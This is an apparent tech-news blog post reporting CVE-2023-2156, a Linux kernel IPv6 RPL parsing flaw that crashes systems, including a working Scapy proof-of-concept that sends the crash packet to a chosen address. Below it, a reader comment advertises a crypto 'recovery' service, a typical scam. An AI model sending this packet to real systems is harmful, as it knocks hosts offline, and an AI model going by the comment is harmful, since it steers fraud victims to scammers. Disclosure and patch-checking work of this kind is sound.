Linux IPv6 "Route of Death" 0day Vulnerability in the Kernel

Linux IPv6 "Route of Death" 0day Vulnerability in the Kernel
3 min read
17 May 2023
2
· 84 · 1

Details of an unpatched (0-day) vulnerability (CVE-2023-2156) in the Linux kernel have been disclosed. This vulnerability allows an attacker to crash the system by sending specially crafted IPv6 packets (packet-of-death). The issue only manifests when the RPL (Routing Protocol for Low-Power and Lossy Networks) protocol support is enabled, which is typically disabled by default in distributions and primarily used in embedded devices operating in wireless networks with high packet loss.

The vulnerability is caused by incorrect handling of external data in the RPL protocol parsing code, leading to an assert failure triggering and kernel panic. When placing data obtained from parsing the IPv6 RPL packet header into the k_buff (Socket Buffer) structure, if the CmprI field is set to 15, the Segleft field is set to 1, and CmprE is set to 0, a 48-byte vector with addresses is unpacked to 528 bytes, causing a situation where the allocated buffer memory is insufficient. In this case, the skb_push function, used to place data into the structure, triggers a check for the mismatch between the data size and the buffer, resulting in a panic state to prevent buffer overflow.

Example exploit:

  # We'll use Scapy to craft the packet 
   from scapy.all import *
   import socket

   # Use the IPv6 from your LAN interface
   DST_ADDR = sys.argv[1]
   SRC_ADDR = DST_ADDR

   # We use sockets to send the packet
   sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

   # Craft the packet
   #   Type = 3 makes this an RPL packet
   #   Addresses contains 3 addresses, but because CmprI is 15, 
   # each octet of the first two addresses is treated as a compressed address
   #   Segleft = 1 to trigger the amplification
   #   lastentry = 0xf0 sets CmprI to 15 and CmprE to 0

   p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / 
      IPv6ExtHdrSegmentRouting(type=3, addresses=["a8::", "a7::", "a6::"], segleft=1, lastentry=0xf0)

   # Send this evil packet
   sockfd.sendto(bytes(p), (DST_ADDR, 0))

It is noteworthy that the kernel developers were notified of the vulnerability as early as January 2022, and over the past 15 months, they attempted to address the issue three times by releasing patches in September 2022, October 2022, and April 2023. However, each time the fixes proved to be insufficient, and the vulnerability could still be exploited. Ultimately, the ZDI project, which coordinated the vulnerability remediation efforts, decided to disclose detailed information about the vulnerability without waiting for a functional fix in the kernel.

Thus, the vulnerability remains unpatched to this day. Additionally, the patch included in kernel 6.4-rc2 is ineffective. Users are advised to verify whether the RPL protocol is in use in their systems, which can be done using the command:

sysctl -a | grep -i rpl_seg_enabled
ipv6 linux cybersecurity 0day route of death
In case you have found a mistake in the text, please send a message to the author by selecting the mistake and pressing Ctrl-Enter.
Follow
Jacob Enderson 4.1K
I'm a tech enthusiast and writer, passionate about everything from cutting-edge hardware to innovative software and the latest gadgets. Join me as I explore the...
Comments (1)
  2. Robert Pattinson

    A MUST READ FOR ANYONE WHO HAS EVER FALLEN FOR CRYPTO SCAM BEFORE

    Another Successful Bitcoin Recovery, My husband and I are another successful client of Recovery Masters among many. I read countless positive reviews about how they have been using their Recovery expertise to help people achieve their happiness back by recovering their scammed or lost Bitcoin and assets from fraudulent and posers of Cryptocurrencies trading companies. After reading many of the wonderful services they render, I had to contact them because my husband was seriously defrauded by some scammers online, it all ended in goodwill as we were able to recover what we thought we had lost to scammers. Contact them on email ( aileenbeacker@gmail.com )

    10 months ago ·
    0
You must be logged in to comment.

Sign In / Sign Up

Similar Posts

  1. Linux This Month: Rocky Linux RC & Linux Kernel 5.12

    Plasma Mobile is an open software system for Linux mobile devices, and the team...

  2. Linux Kernel Vulnerabilities Grant Local Attackers Root Privileges

    Two components of the Linux kernel contain security vulnerabilities that grant l...

  3. IP Blocking in Linux: `ip route` vs. `iptables`

    When it comes to securing your Linux system and network, blocking unwanted IP ad...

  4. Faster Fixes: Ubuntu's Plan to Reduce Linux Kernel Package Vulnerabilities

    Kleber Souza, an engineer at Canonical who maintains Linux kernel packages for U...

  5. Linux This Month: A Christmas Kernel, CentOS 6, and SUSE rumors

    Today we'll be discussing some of the things that have been happening this month...

  6. Ubuntu 22.04.3 LTS release with graphics stack and Linux kernel update

    Ubuntu 22.04.3 LTS distribution update has been compiled, which includes changes...

  7. Linux 6.4: New Kernel Features - What's Changed in the Release

    The new version of the Linux kernel, 6.4, has arrived just two months after Linu...

  8. Linux This Month - The future of CentOS, and Linux on Mars

    By now, you've probably seen some sort of news on the landing of the perseveranc...